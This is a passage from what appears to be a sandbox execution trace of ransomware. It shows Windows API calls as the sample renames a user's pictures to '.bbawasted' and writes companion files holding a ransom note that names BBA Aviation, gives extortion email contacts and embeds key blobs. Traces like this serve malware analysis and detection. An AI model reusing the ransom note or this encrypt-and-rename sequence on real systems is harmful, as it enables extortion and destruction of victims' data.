dwNumberOfBytesToMap=0xa348) returned 0x5f0000 [0224.055] CloseHandle (hObject=0x288) returned 1 [0224.057] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.057] CloseHandle (hObject=0x294) returned 1 [0224.057] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0224.057] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a62c8) returned 1 [0224.058] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0224.058] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0224.058] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0224.058] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0224.058] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0224.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0224.067] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0224.067] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.067] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]g0dWtMXaeK5NZ8DKlBJtGEQpyK0HBuPv7Qf9tRlFPh+YvBNXUbAvKNR8JOnRpmEI\r\nOrGgBRU81mPm7JQLWF9T22vSmZdyGGBrxGZ4B6aaMFQkv1NuzjSCUkmRmt3IUwzx\r\n123dgINOIm3JJ0ii8iD/TZMY+yRKTBlui7WNyjs+pEAfWRc9qJ4cLDABRBCJrS66\r\nCNpNZ/6kfPSsSV4+zn7A3NJx6xA/5RuC6gKo38K9rMFzwemA2J+YBlxA8EJsVoMJ\r\n7v1t9BEVY4vgGoKwSKu4wEXSRUtkxTVX256SslJl2Ltlk74DMON819t4cFamgIXT\r\nmyR7xhWayyN+/6Gu/W4WuU18kNrl9Q0s2z+fh7QZZeG/5EjDlxWchjDPtlRpdNB7\r\n3tgjF3U+qDKBgVEaQavhxP4JRSy+g92I1ysLN4SvmwFesuqvm5XQUa1QbWpUe3+p\r\n7hDqAIgByT+3mo3m8BzchuFCwedtBoabWSRquSrQLQtMs9jgt4t0wI1SXwtzyWYc\r\noC3ownm4I0fFoh2mRvWT588raRmcZ1qaXNF3hFnKngM5s09RhHQcD3Gc8mCaDAls\r\njslc/5zUrcldBuGTwqYLTzI0Jti6kQe2UGLyS2S6HWKtu08RSNjnDKdV0CihhDcD\r\n9EdwgmdtyLvtG1mwZwNm9avrYhmltb89zOtMO6+EIEK=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0224.068] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0224.068] SetEndOfFile (hFile=0x28c) returned 1 [0224.070] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.070] CloseHandle (hObject=0x28c) returned 1 [0224.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0224.071] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a51c8 | out: hHeap=0x660000) returned 1 [0224.071] _aulldvrm () returned 0x0 [0224.071] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6bd0) returned 1 [0224.072] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0224.072] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0224.072] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\4BgIJTeBtBUbRC.gif") returned 53 [0224.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x274) returned 0x6bc8e0 [0224.072] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.072] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.072] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a60a8) returned 1 [0224.072] CryptGenRandom (in: hProv=0x6a60a8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.072] CryptReleaseContext (hProv=0x6a60a8, dwFlags=0x0) returned 1 [0224.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\4BgIJTeBtBUbRC.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\4bgijtebtbubrc.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0224.075] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.076] SetEndOfFile (hFile=0x28c) returned 1 [0224.076] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.076] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.076] lstrcpyW (in: lpString1=0x6bc94a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\4BgIJTeBtBUbRC.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\4bgijtebtbubrc.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\4BgIJTeBtBUbRC.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\4bgijtebtbubrc.gif.bbawasted")) returned 1 [0224.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\4BgIJTeBtBUbRC.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\4bgijtebtbubrc.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0224.082] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0224.083] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0xe7e [0224.083] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xe7e) returned 0x5f0000 [0224.083] CloseHandle (hObject=0x294) returned 1 [0224.084] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.084] CloseHandle (hObject=0x288) returned 1 [0224.084] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0224.084] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6790) returned 1 [0224.085] CryptGenRandom (in: hProv=0x6a6790, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0224.085] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0224.085] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6d68) returned 1 [0224.086] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0224.086] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0224.096] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0224.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0224.097] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.097] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]jMGIYme+72QlbEJMmE/UP+A6jGXFwLHm4uMscPkgjo3ww7EmrJgM4F6kKBBLNgVl\r\nIWO9sfv64l33HUIczGOqa7WFTgZfOZnp5n1QiCwLldcDNtEaqB3anto2YS35ySNv\r\nLO/5XXIU+HS4rBkMmqkdqvnGFJonVzJIO+qX1Q9Lw+gKaAMmixpqZBCjYEzTVnRR\r\nwiTfq2euGTc9lwgvvSWUQlY3cto6B3cdZ4lFmQ0JbhL7r782Qe9CKzLdzFP4bZoD\r\nctTEUp+5zWu2K9lQSBaxp3QUzUg8GoHXXz4P2afVhNWFO41zkRTCv1sM7uxa2tuN\r\nK6krAIAOcG+B6G4Pmqmwx8sSa9MvThkQpMTPJZ3MZvyYoigBeje+dtBy8q4AXfm3\r\n2FT/nC+svix3IN8j0Yh0Ru/msa/iPtciM2HpglMPDGR/suxA8z24LjsENHhtVwHV\r\n5vyTjIWDZybw+ArvV6Wb9eqdTPsTl8aGyGZPXhKlLVhmEOicRD8DCTUz+ERN7tv7\r\nO0MT+h8rgAipbIljIfKPI8INKeCf26e0kIk1yrZxwnzHq0HbS1YNObmH5MdLFxq+\r\nzAMpO7TXJ2UpgR0Ea/VY0tYarZOODWOL9W6PN4zAV7OmGldHcI19kkhhohqK4d9k\r\n3p+R+hswft37paYstW7O69SQhHEDtp3vuAHDM3fjDZn=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.097] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0224.097] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0224.097] SetEndOfFile (hFile=0x28c) returned 1 [0224.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.100] CloseHandle (hObject=0x28c) returned 1 [0224.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0224.100] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b76d0 | out: hHeap=0x660000) returned 1 [0224.100] _aulldvrm () returned 0x0 [0224.100] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6b48) returned 1 [0224.101] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0224.101] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0224.101] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\83USGD08Tcabv3AM5a3G.bmp") returned 59 [0224.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x280) returned 0x6bc8e0 [0224.101] lstrcpyW (in: lpString1=0x6bc956, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.101] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.102] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a62c8) returned 1 [0224.102] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.102] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0224.102] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\83USGD08Tcabv3AM5a3G.bmp.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\83usgd08tcabv3am5a3g.bmp.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0224.103] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.104] SetEndOfFile (hFile=0x28c) returned 1 [0224.105] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.105] lstrcpyW (in: lpString1=0x6bc956, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.105] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\83USGD08Tcabv3AM5a3G.bmp" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\83usgd08tcabv3am5a3g.bmp"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\83USGD08Tcabv3AM5a3G.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\83usgd08tcabv3am5a3g.bmp.bbawasted")) returned 1 [0224.106] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\83USGD08Tcabv3AM5a3G.bmp.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\83usgd08tcabv3am5a3g.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0224.106] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0224.106] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x1541e [0224.106] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1541e) returned 0x5f0000 [0224.107] CloseHandle (hObject=0x288) returned 1 [0224.361] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.362] CloseHandle (hObject=0x294) returned 1 [0224.362] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0224.362] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0224.363] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0224.363] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0224.363] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a64e8) returned 1 [0224.364] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0224.364] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0224.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0224.376] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0224.376] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.377] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]riREvBGofF2Msd+XOAEd8U7wO21cMlrd7/I/kh/aOxbwM5GmnpPzujV0M3MGW1co\r\nSkc+CIKnJsy6HCtDBxWQnuLG6WmDcwaGjNQ3u4POJ4/Ss95qOJxk4NZZw0IFRXEH\r\n5yLjXO6Ge7tfVrIPLzV59k03UKyNm7vOE7vCup/2zW+IFd7LK4ztroYN3uWddWs6\r\naIdMIZ4zVwfzA5up5aM3XKarYmo0F/dF0NLf4U+vXqBFdQg3doKK541Axi7PgHbx\r\nv72+FNVUswP0EvVZjewxkMnTGwlk65UYAmH7r6R214kgbGSIABOoBTMO4b21M4Ox\r\nzlaWUwRk6Wvhk+4JSJ3B9nlKFkvB8GFjxdc++3P7Mlxtby0it6TeHbp5Uqarcr+u\r\ndX7oCyZG63wEhU2yRlwKHiQRgUJSQmi706B3hVhqNrQvT6LGOTAGgxjHYgWXz8e0\r\n/2wLIW3kealgs/y0vydsu/yyZrW6hF/aZ0S5VPCsWJ8Uy9GkbIXGgu4P8U5f2JCO\r\naqCdvcadWcR7MW/8GRP5MwryPfvQemorKXnLy9yvQ61TQf+DWj9fHdjiWUXTTOaG\r\nKOOSiw8XkO85oJdOxq0FHGg4BT7FuiA5QMfNE9SOkmsPQTQw6cWUJHMIeBgQIQHi\r\nHiOmi9FGKy2HUsXc29gzBLXB4bITDns7EJtBsqmxLMK=[end_key]\r\nKEEP IT\r\n") returned 984 [0224.377] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0224.377] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0224.377] SetEndOfFile (hFile=0x28c) returned 1 [0224.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.380] CloseHandle (hObject=0x28c) returned 1 [0224.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0224.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa718 | out: hHeap=0x660000) returned 1 [0224.381] _aulldvrm () returned 0x0 [0224.381] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0224.381] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0224.381] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0224.382] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\iuBnnkTu.gif") returned 47 [0224.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x268) returned 0x6adb18 [0224.382] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0224.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0224.382] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0224.383] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0224.383] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0224.383] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\iuBnnkTu.gif.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\iubnnktu.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0224.384] WriteFile (in: hFile=0x28c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0224.386] SetEndOfFile (hFile=0x28c) returned 1 [0224.386] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0224.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0224.386] lstrcpyW (in: lpString1=0x6adb76, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0224.386] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\iuBnnkTu.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\iubnnktu.gif"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\iuBnnkTu.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\iubnnktu.gif.bbawasted")) returned 1 [0224.387] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\7Yid1\\iuBnnkTu.gif.bbawasted" (normalized: "c:\\users\\fd1hvy\\pictures\\7yid1\\iubnnktu.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0224.387] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0224.388] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x10f0f [0224.388] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10f0f) returned 0x5f0000 [0224.388] CloseHandle (hObject=0x294) returned 1 [0224.392] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0224.393] CloseHandle (hObject=0x27c) returned 1 [0224.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0224.393] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6350) returned 1 [0224.394] CryptGenRandom (in: hProv=0x6a6350, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0224.394] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0224.394] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0224.395] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0224.395] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0225.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0225.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0225.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0225.003] _snwprintf (in: _Dest=0x6bdcf0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 